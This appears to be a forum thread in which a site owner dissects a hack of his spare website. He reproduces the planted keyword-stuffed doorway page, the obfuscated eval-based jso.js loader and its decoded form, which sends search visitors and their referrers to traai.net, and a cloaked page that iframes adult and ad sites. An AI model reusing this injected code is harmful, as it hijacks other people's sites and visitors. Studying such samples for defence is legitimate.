1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

I've lost my virginity... I've been **cked

Discussion in 'BlackHat Lounge' started by artswerdstone, Jan 30, 2008.

  1. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Yes, the title is right, although I could safeguard my values to be untouched for a pretty long time, but a couple of days ago the bad thing that no one of you wants did happen. I've been hacked.
    Hacked, fortunately not on my live sites, but on one of my spare ones.
    The site just had a simple index.html file with a simple redirect script on it.
    I just browsed my site stats when I observed about 300 views and 3M traffic on such a site of mine. All with 0 uniques. I was curious about what could make such traffic on a redirect script?
    Funny thing, the list of displayed pages enumerated dozens of html pages within the folder /images/thumbs/.
    I never made such a folder and most of all I never shared my cpanel login and password with anyone.

    What I've found after a little examination was very black hat.
    Cloacking pages with random content and some spiderfood consisting of stuffed keywords and a javascript.

    All seems to be a very interesting experiment, just I can't guess it's ultimate purpose.
    If you are interested in vivisectioning this black hat cloacking content, here it is for you, programmers:


    A sample html file:
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
    
    <title>Kaffemaschine luna stern dvd, luna torino it lunar new year</title>
    <meta name="robots" content="noarchive">
    <script language="JavaScript">
    <!--
    var default_keyword='kaffemaschine';//
    //-->
    </script>
    <!-- %HEADHTML% -->
    </head>
    
    <body>
    <!-- %BODYTOPHTML% -->
    
    <script language="JavaScript" src="jso.js">
    </script>
    
    <p><a href="kaffeeautomat.html">kaffeeautomat</a> | <a href="journalduporn.html">journalduporn</a> | <a href="jorgemartinez.html">jorgemartinez</a> | <a href="jollenkreuzer.html">jollenkreuzer</a> | <a href="joleneblalock.html">joleneblalock</a> | <a href="johnnyjerkoff.html">johnnyjerkoff</a> | <a href="johanniskraut.html">johanniskraut</a> | <a href="johannisbeere.html">johannisbeere</a> | <a href="johannesburgo.html">johannesburgo</a> | <a href="jobcentreplus.html">jobcentreplus</a>
    <h1>Kaffemaschine luna stern dvd, luna torino it lunar new year</h1>
    <p>Luxor 2 gratis job curriculum luxor gioco pc luxor mah jong luxor 2 deluxe job consulting. Luz de domingo, job definition, job decription luxury home it luxor the game, luxury and car. Lupi sui monti, lupin iii foto, lupin 3 hentai lupin e fujiko, joanna spendel joanna shimkus. Lux disco club joaquin turina, lutto india it lux delux coda lux et tenebra joaquin sabina. Joaquin cortes lust on demand lust world net lust puppy gay lust und liebe joaquim cortez. Job birmingham, lux luxvide it luxa test adsl, job automotive lux video roma lux mot torino. Lusso a parigi lusso a londra joao rodrigues lusso a milano lusso a torino joao guimaraes. Lutron am 4201 luton air port lutron sl 4022 joaquin phonix, lutron tm 914c joaquin phenix. Lwo model free, lviv gazeta ua job enrichment lvmh italia it luz para todos, job employment. Lunga notte 43 joanna bacalso lungo il fiume, lungo fungo it, joanna baillie, lung ying kuen. Joan plowright joachin sabina, luna stern dvd luna torino it lunar new year, kaffemaschine. Lusy de simone luther king it, luther il film, lutero 95 tesi joaquin garcia, joaquin cortez. Joanna jhonson luogo sex roma lupa film foto luogo x coppia, joanna jameson luois de funes. Lupo dei cielo lupin planet o joanna tugjobs, lupin iii sexy lupo che ulula, joanne fabrics. Lux in tenebra, job australian job assessment, lux libera nos lux et veritas, lux hotel roma. Joanna chatton luoghi x sesso luoghi di roma, luoghi di fede luogo di culto joanna cassidy. Job experience lwww laurax it lword season 2 lwww google it job evaluation lword season 4. Lupo gti usate lupo gti usato, lupo gti usata, joannes brutto joannes lovely, lupo grigio it. Joanthan davis lurlo di munch lupus et agnus, lusive la lune joannes torino lupus led cura. Lupi curva sud joanna johnson, lupa foto roma, lupen 3 codice joanna needham, lupi da branco. Luogo di pesca luogo di morte, luogo non pace joanna gleason joanna collins luogo gay roma. Lungo la senna joanna cameron, lungo il weser, lungo la valle joanna brodzik, lungo la notte. Lupo di pietro lupo di bronzo lupo di gubbio joanne whalley joanne rowling lupo di frutta. Luxman sq 38fd job consultant, job commission luxmedia 10 x3, luxman lr 7500 luxman lr 8500. Lust for blood lusso a vienna joao vellutini lusso per cani joaquim cortes lusso cuneo it. Joanna pacitti joanna newsome lupi nel bronx lupi in italia lupi e agnelli lupi nel bosco. Joan sebastian lunch break bj lunch blow job joan severance lunch time spa lune d oriente. Job challenger luxman dva 250, luxman ld 2200 job california, luxman lr 6500, luxman c02 m02. Lunedi al sole, lung chuan pai lune della tim lung sat arese joana redgrave joann gourcuff. Joannes paulus lupo nel mondo lupo in ticino lupo sandro it lupo rocco srl joannes prezzi.
    <h2>Lybra sw usata lycatop up net, lycos chat com lycos chat ita</h2>
    <p>Job netherland job networking, lynn greer nba, lynn cock teen, lying from you lyman 1200 dps. Lyrics wake up, lyrics via via lyrics to midi, lyrics to live jocuri biliard jocuri celular. Lycos it testi, job interinale job interviews lycos com mail, lycos email uk, lycos gioco it. Lyric many men job youngstown lyric jay chow lyric marron 5 lyric jem they job veterinary. Lyrics the sea, lyrics the one jocuri actiune, lyrics the end jocks magazine, lyrics the way. Lyrics x japan lysine for cat jocuri federal lysator liu se, jocuri erotice lyrics you got. Jobtel dossier, jobst stocking lyrics in love lyrics i still, lyrics il sole, lyrics hold me. Lyrics road to lyrics tell me jocker gommoni jocko blogspot lyrics take it lyrics take me. Lyrics of song lyrics of hurt, jochen sattler, jochtal valles lyrics old man lyrics oh mama. Lyric com midi, lyric audio it, job scheduling job restaurant lyric break on lyric dei musa. Job recruiting, lyon tour rosa job recruiters lyreco com olo lyric 5 giorno, lyon part dieu. Jobs liverpool jobs marketing lyrics cause i lyrics di mina lyrics come in lyrics deja vu. Jobs edinburgh lyrics all the lyrics call me lyrics and tab lyrics bad day, jobs frankfurt. Lyric to proud jobs available lyric to songs lyrics 50 cent jobs australia, lyric z musica. Lybra 1900 jtd lwww libero it lybra 2400 jtd job gillingham, lx200 16 meade job government. Job journalism, lycos mail com lycos uk email job motivation, lycos mail top lydl in italia. Lyrics love is, lyrics look at lyrics life is lyrics love me jocelyn osorio, jocelyn binder. Lyrics my life lyrics moon on jocelyn pulsar lyrics my love jochele falzes lyrics my hump. Jobs sheffield jobs singapore lyrics fix you lyrics doo bee, lyrics du hast lyrics el beso. Lybra sw usata lycatop up net job headhunter job healthcare lycos chat ita lycos chat com. Lyric get away lyric ehi lady lyric dream on, lyric don rich job separation job statistics. Mp 3 downloads mp 05 megatron jocuri haioase mp 10 download mp 3 converter jocuri machine. Lyric the fray jobexpress net, lyric to nasty lyric tell him, lyric the kill, jobim songbook. Lyrics kiss me, joburi romania lyrics la vida, lyrics kelis i, lyrics king of joceline brown. Lyrics plug in, jocke karlsson lyrics one way jocka tormento lyrics on line lyrics pump it. Jobespresso it lyric static x, lyric sam dees, lyric song com, lyric reed lou jobexpress com. Jobs worldwide jobs vacancies lyrics hip hop lyrics fuck it, lyrics for you lyrics for mp3. Jobcentre plus, jobespresso br, lyric of songs lyric nome jam, lyric oh marie lyric mina bau. Job university job technology lyric hear you, lyric il mondo lyric io canto lyric hey jude. Lyon mode city, job ostschweiz lyon moda city job psychology lynx s lampada, lynn lemay sex.
    <h2>Mp audio mixer mp blu vertigo, mp brian molko mp bruno lauzi</h2>
    <p>Mp sheryl crow joey mansfield mp service net joey mendicino mp s10 manuale mp service srl. Jogos gratuito jogos infantil mp3 alla radio mp3 alicia key mp3 alta marea mp3 all saints. Mp paolo bello mp paola turci joerg steineck joemonster org mp miles davis mp norah jones. Jogging milano, mp3 a suonerie, mp3 a spartito mp3 a suoneria, jogging scarpa mp3 a cassetta. Mp matia bazar mp mick jagger mp maria carey, joemeek threeq mp marvin gaye joelle leandre. Mp bruno lauzi joe marmellata, mp audio mixer mp brian molko joe frusciante mp blu vertigo. Jogging volley jogos eroticos mp3 album wrap mp3 alfa romeo mp3 al stewart mp3 afm mp3lib. Mp3 bob marley mp3 blogs soul, johan carlsson mp3 blue tooth, mp3 blues 2006, johan crawford. Jody scheckter, mp alice chain jocuri telefon, mp alicia keys, mp alex britti mp alex baroni. Mp3 125 prezzo joey wednesday mp tina turner mp3 1gb inovix, mp wyclef jean joey valentina. Jogging shorts mp3 acer mp330 mp3 acer mp110 mp3 abba gimme mp3 abba teens jogging stecca. Johan kuijpers mp3 cdx gt200s mp3 cd players mp3 cell phone mp3 cd philips johan libereau. Mp luigi tenco mp lettore mp3 joelle jolivet joelle coquine mp luis miguel, mp limp bizkit. Joel zacchetti, joel sternfeld, mp kurt cobain mp las ketchup mp lauryn hill mp lene marlin. Joga kundalini mp3 400 prezzo jogging italia mp3 400 prezzi mp3 2gb prezzo mp3 30 secondo. Mp kelly joyce mp john lennon, joel schumaker, mp johnny cash mp gary barlow, joel shumacher. Mp3 ben harper, johan backlund mp3 billy joel mp3 bella ciao johan bruyneel mp3 beach boys. Mp3 born again mp3 boia molla mp3 bobby solo johan eriksson mp3 bossa nova johan elmander. Mp3 anna marco jogurt cremoso jogurt ricetta mp3 and organo, mp3 audio book, mp3 astro ciel. Joel rodriguez mp flipper com, mp frank zappa, mp fatboy slim mp gabri ponte joel parkinson. Joey jordinson mp rita pavone mp risk agency mp patty pravo joey armstrong, mp paolo conte. Mp3 c++ winapi, mp3 car stereo, johan heinrich mp3 car player mp3 cassa sony, johan gouteron. Mp3 avi ubuntu, mp3 audio nero mp3 autio book, mp3 audio film johan anderson joh frusciante. Mp3 2 liocorni, mp3 250 padova joey wrestling, joffrey ballet mp3 1gb prezzo, mp3 2gb prezzi. Mp3 cd burning johan huizinga johan johansen, mp3 cd convert mp3 cd changer, mp3 cd creator. Jocuri minimax mp 3 nokia6600 jocuri mahjong mp 7500 alpino mp 3 maracaibo mp 40 marushin. Joel camathias mp craig david mp bryan adams, mp cs255 mpman mp celine dion joecartoon com. Mp david bowie, joel despaigne, joel goldsmith mp def leppard mp emma burton, mp deep purple. Mp spice girls joey tribbiani mp the ramones joey miyashima mp sonic youth mp smash mouth. Mp3 amico sole, jogos musicais, jogos infantis mp3 and gratis mp3 amore mina mp3 and milano.
    <!-- %BODYBOTTOMHTML% -->
    </body>
    </html>
    And here is the jso.js script file:

    Code:
    ffunction shadow_run(s2){m = parseInt("0x" + s2.substring(0,2));s3= "";q= (s2.length/2) - 1 ;for (i=0; i<q; i++){n = parseInt("0x" + s2.substring(2+i*2,4+i*2));n = (n - m);if (n < 0)n += 256;m++;if (m > 255) m = 0;s3 = s3 + String.fromCharCode(n);}return s3;}eval(shadow_run('BE2725E8353B3329342CE73B2C323039322D3D453E3438461213FE4D473E4042464C4444085E5F0558494F4D564F4A5A625B5155631B66575D5B645D586870695F63713D2866686A667B737C3045157E4A727E73867F78828944897D7F7F8D8E82905A2A9350908599898F50585293A0A19E698C608E625D745E929966B47C69976C9C6B6A716C7F4FAA849AAEB190C4BD7C73828C5CBCBA7D77BBC7BCCFC8C1CBD28DC3D0D1CECDCA94D4C9DDCDD3949CE1E2D5E4E5DCE3E3DFDBB5B2AFAFAFB6B3B3B9B9B7B2ADA5ACADA8EDB8F8ED01F1F7B8C0BAEFC211F4C0C000090A030903FBCE1D15080517090F04D7D2D9D7D6ED1C231F0EE130281B182A1C2217EA292735251DF0263332EA43293C3527FA303D3C4C323E3F483D3B4E3D3B36093F4C4B035C424E57455B4F5A5C4A46194F5C5B136C64575466585E5326725B636B6C5A2D7C62716F60332E6A7776866E7B693C847B3A368F877A77897B817649848D7A4D8E8696968786968C84578D9A9951AA9D95A5A59695A59B659BA8A7646BA6675F666762B572AEB4ABADC199B17474C0B4C3C6BEC782B6C9C7D0808398998A8F886ADC6C6CDAC6D887CFA68CD3E0E1DEA99FA0949ED8DAD9E6DCDECFCDC5C0EDECF0F0F0E8F2F9AEAEADC0BEB0C3BFB3C5C1B6C8C4B9CBCFBCCAFEBFD101C2D4D4C5D8D6CACDD0CDD61117D80E1316EDD6DB24151B19221B16262E271D212FE9E6E6342732362A2C04EFF42F392F3C323425231B1643424646463E484F04414D42554E47515813584C4E4E5C5D515F171A10181863556757645D6D5F6D3921696479787175682B796C452D7D703282804C41375A67686575695D5F5F6D616F5B464B86908693898B7C7A726D9A999D9D9D959FA65B98A499ACA59EA8AF6A92908B696C6969A8AAACA8BDB5BEAAB7B2C7C6BFC3B6907B80BABCBEBACFC7D0BCC9C4D9D8D1D5C8A070E48873CFD7DFD278EA7A7AD6E2D7EAE3DCE6EDA8DEEBECE9E8E5A1A2C0A4A7F9FAEDFCFDF4FBFBF7F3CDCAC7C7C7CECBCBD1D1CFD6BC0DFF1308DED1C5DFAFAF100ED11E241C121D15D0151719152A222B17241F34332C3023E1FEE93832292B2D31372F2FF3EDF4F5F0353739354A424B37443F54534C504309EBEB5EEEEEEF5D495B0A52290F566364612C222317215B5D5C695F6152504843706F7373736B757C313130434433464736494A39475B3C4E503F5162425465455759485A684B5D5D4E5C705163615466775769785C5F625F68ADA09DAFA1A77FA9AE80A9B36CA9BCB7938895728086BD7C98B8B9C1BFC5BF84A6D0BFC8D785D19E898EC8CACCC8DDD5DECAD7D2E7E6DFE3D6AE7E7EF381F58384E4E2A5F2F8F0E6F1E9A4ECA7C4AFFEF8EFF1F3F7FDF5F5B9B3BABBB6FEC1A315A5A50604C7141A1208130BC61C1B0E091D11111721151426F0F1DC2B251C1E20242A2222E63C3DE338372A25392D2D333D313042F8DADA4DDDDDDE3A463B4E47404A510C414F455B1157595F534D175961515F545B5F682F1A5C5E5A5B5D672136060607636F64777069737A356A786E843A8082887C76408075877D808656414B8C95455A2A2A2B8793889B948D979E59A39F97A39559596F9D9BA898A59E5AAEAEA07B666BA86D6A64B8BAC0B4AE87C2B5B1C2B78A8282837990BEBCC1C0C2CF968E8E8F859CC4D2D6C9CBD9A299DAE3A7DCE4D4E2D7DEE2EBAFD7ECECE8B5B9B8ACE7E5F2E2EFE8C2ACAFC29292079595F2FA02F59B9B0E9E9E9FFB07FC0F08010B12CD0C100504180E1515E510E5B5B52AB82C'));

    Has anybody some idea about what's this?

    Well I don't want to give you too tough quizzes, thus as a little help for you, I've already decoded the file.

    I've decoded it in one minute using the "lazy way": I've changed 'eval' to 'alert', then I've added <script language="javascript">
    at the beginning and </script> at the end of the file,
    I've saved the file as .html, then I've opened it in a browser, and voila:

    Code:
    if(typeof scheme_number=='undefined'||!scheme_number)scheme_number='default';
    r=document.referrer;
    r.match(/(http:\/\/)?(a-zA-Z.]+)/);
    d=RegExp.$2;
    if(!document.cookie.match(/ssessionid=9543954985/) && 
    d.match(/(\.|^)(google\.|search\.(.+)?msn\.|search\.live\.com$|ask\.com|alltheweb\.com$|altavista\.com$|search\.yahoo\.|aol\.(com|co\.uk)$|search\.hp\.netscape\.com$|netscape.com)/i) 
    && r.indexOf('result.aspx')==-1)
    { 
        var g="http"://"+decodeURIComponent('%74%72%61%61%69%2e%6e%65%74')+'/in.cgi?'+scheme_number+'&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERRER='encodeURIComponent(document.URL)+'&default_keyword;
    }
    else
    {
        document.cookie="ssessionid=9543954985;path=/";
        if(typeof default_keyword!='undefined'&& default_keyword)
        {
            var g="http"://"+decodeURIComponent('%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D')+'/search?hl=en&btn=I%27m+Feeling+Lucky&q='+default_keyword;
        }
    }
    
    if(typeof g!='undefined'&& g)
    {
        if(typeof use_redirect=='undefined'||!use_redirect)
        {
            document.body.style.overflow='hidden';
            document.body.style.margin='0px';
            document.write('<iframe src='+g' style=width:100%;height:100%;border:0px;overflow:auto;></iframe');
        }
        else
        {
            document.location=g;
        }
    }
    Decode URI component is not a problem even for a 5th class kid.

    First URI points to traai.net, and second to google.

    Just for curiosity, I've visited traai.net and I've found there some interesting stats:

    Code:
    http://traai.net/stats/55xir37fxk.stats.daily.2008_01_30.html
    and also

    Code:
    http://traai.net/stats/55xir37fxk.stats.total.html
    Isn't if a funny experiment?

    I wish you not to find some of your sites included in the stats.

    Well, these are the things I've found in a blink after I've lost my virginity and I've been hacked.

    Now, it wouldn't be bad to know who did it, and most of all why?

    Any idea, fellow blackhatters?
     
  2. relaxin

    relaxin Junior Member

    Joined:
    Aug 13, 2007
    Messages:
    100
    Likes Received:
    25
    Occupation:
    CEO
    I'm not sure about your situation but anyone can use traffic magic bot to spam your stat.
     
  3. nephalim

    nephalim Newbie

    Joined:
    Jan 12, 2008
    Messages:
    23
    Likes Received:
    50
    Home Page:
    I'm glad it happened to you and not me! I would not have a clue how to figure out what was going on.
    What were they trying to do? Was your site like a springboard to build hits to their site? And how on earth did they gain access to your cpanel?
    I guess a noobie virgin. :baby09:
     
  4. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    This is not Magic Traffic Bot spam of my stat.
    The hacker broke into my server and actually created there hundreds of pages. The stats below are not mine, those are the hacker's stats for the parasite pages he created on his victims' sites:

    http://traai.net/stats/55xir37fxk.stats.daily.2008_01_30.html

    http://traai.net/stats/55xir37fxk.stats.daily.2008_01_30.html

    http://traai.net/stats/55xir37fxk.stats.daily.2008_01_29.html

    http://traai.net/stats/55xir37fxk.stats.daily.2008_01_28.html

    http://traai.net/stats/55xir37fxk.stats.total.html
     
    • Thanks Thanks x 1
  5. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Further to the previous information, the in.cgi of the site with stats redirects to other cloacked sites based on triggering keyword.

    Look at the source of one of the cloacked sites:

    Code:
     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <HTML xmlns:IE>
    <HEAD>
    <STYLE>
    @media all {
    IE\:CLIENTCAPS {behavior:url(#default#clientCaps)}
    }
    </STYLE>
    <IE:CLIENTCAPS ID="oClientCaps" />
    <title>Web 2.0 Application Loading...</title>
    <!--[if IE]>
    <style type="text/css">
    img { behavior: url(pngbehavior.htc); }
    </style>
    <![endif]-->
    <style type="text/css">
    <!--
    body {background-color: #BCBCBC; padding: 0; margin: 0;}
    -->
    </style>
    <script type="text/javascript" src="cookies0.js" ></script>
    </head>
    <body>
    <table width="100%" height="100%" border="0">
    <tr>
    <td><table border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
    <td height="245" align="center"><p><img src="apple000.gif" alt="" width="96" height="112"></p>
    <p> </p>
    <p><img src="spin0000.gif" alt="" width="38" height="38"></p>
    <p>
    <script type="text/javascript" src="progress.js"></script>
    </p></td>
    </tr>
    </table></td>
    </tr>
    </table>
    <script language="javascript" type="text/javascript"><!--
    if (oClientCaps.connectionType == "modem")
    {
    document.write('<iframe WIDTH=1 HEIGHT=1 src="http://my-istat.cc/adsview/a66?tip=user"></iframe>');
    }else {
    document.body.style.overflow='hidden';
    document.body.style.margin='0px';
    document.body.innerHTML='<iframe src="'+'http://'+decodeURIComponent('%77%77%77%2e%61%64%75%6c%74%66%72%69%65%6e%64%66%69%6e%64%65%72%2e%63%6f%6d')+'/search/'+decodeURIComponent('%67%38%38%32%33%35%32%2d%70%63%74%2e%73%75%62%69%74%61%6c%69%61%6e')+'?ip=auto&override=1&age=18-28&lang=italian'+'" style=width:100%;height:100%;border:0px;overflow:auto;></iframe><iframe height=1 width=10 frameborder=0 src="http://e.pepato.org/e/ads.php?b=783"></iframe>';
    }
    // -->
    </SCRIPT></body></html>
    This makes the hacker's purpose very clear, I hope.
     
  6. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Has anybody an idea how to get in.cgi from the site without executing it?
     
  7. idenguy

    idenguy Newbie

    Joined:
    Feb 8, 2008
    Messages:
    18
    Likes Received:
    1
    Is it possible to use tamper data w/ firefox. and find the reference and VIEW Source. or save as.

    That has helped me with getting files I had difficulty getting before.



    Thanks
     
  8. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Thanks for good intentions, but Firefox will let me to see the source of the generated page, not that of the cgi.script.
     
  9. idenguy

    idenguy Newbie

    Joined:
    Feb 8, 2008
    Messages:
    18
    Likes Received:
    1
    oh, sorry. I thought that it seemed a little too simple. So I should have know it wouldn't work the way i had pictured it.


    Thanks,

    Chris
     
  10. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    No problem. The question is still open:

    Is there a way to fetch the .cgi file source from a site without executing the script?
     
  11. blackberry

    blackberry Power Member

    Joined:
    Apr 26, 2009
    Messages:
    675
    Likes Received:
    218
    Occupation:
    Making money
    Location:
    Planet Earth
    Assuming you have access to cpanel of the relevant website, just go to "file manager" then browse to the relevant directory and then right click the CGI file and let-click on EDIT.

    Then you can read the file without executing it.


     
  12. jazzc

    jazzc Moderator Staff Member Moderator Jr. VIP

    Joined:
    Jan 27, 2009
    Messages:
    2,468
    Likes Received:
    10,148
    Maybe after 4 years he 's already solved it... :eek:
     
    • Thanks Thanks x 3
  13. Duffers5000

    Duffers5000 Elite Member

    Joined:
    Apr 1, 2012
    Messages:
    2,466
    Likes Received:
    7,615
    4 Years 8 Months.......Could this be a new gravedigging record ??
     
    • Thanks Thanks x 1
  14. poorboi

    poorboi Regular Member

    Joined:
    Sep 17, 2010
    Messages:
    201
    Likes Received:
    111
    Location:
    /b/
    Dont mind guys its Saturday!
     
    • Thanks Thanks x 1
  15. IamNRE

    IamNRE Jr. VIP Jr. VIP Premium Member

    Joined:
    Aug 18, 2010
    Messages:
    4,663
    Likes Received:
    7,108
    Occupation:
    Generate Leads With FB Ads For Just $1
    Home Page:
    Did it go "POP" when it happened?
     
  16. axus_auto

    axus_auto Power Member

    Joined:
    Jul 13, 2011
    Messages:
    513
    Likes Received:
    502
    Unwilling aggravated forced entry. That sounds more like rape.
     
    Last edited: Oct 20, 2012
  17. charmander916

    charmander916 Newbie

    Joined:
    Jul 29, 2012
    Messages:
    16
    Likes Received:
    2
    I'll believe it when I see it.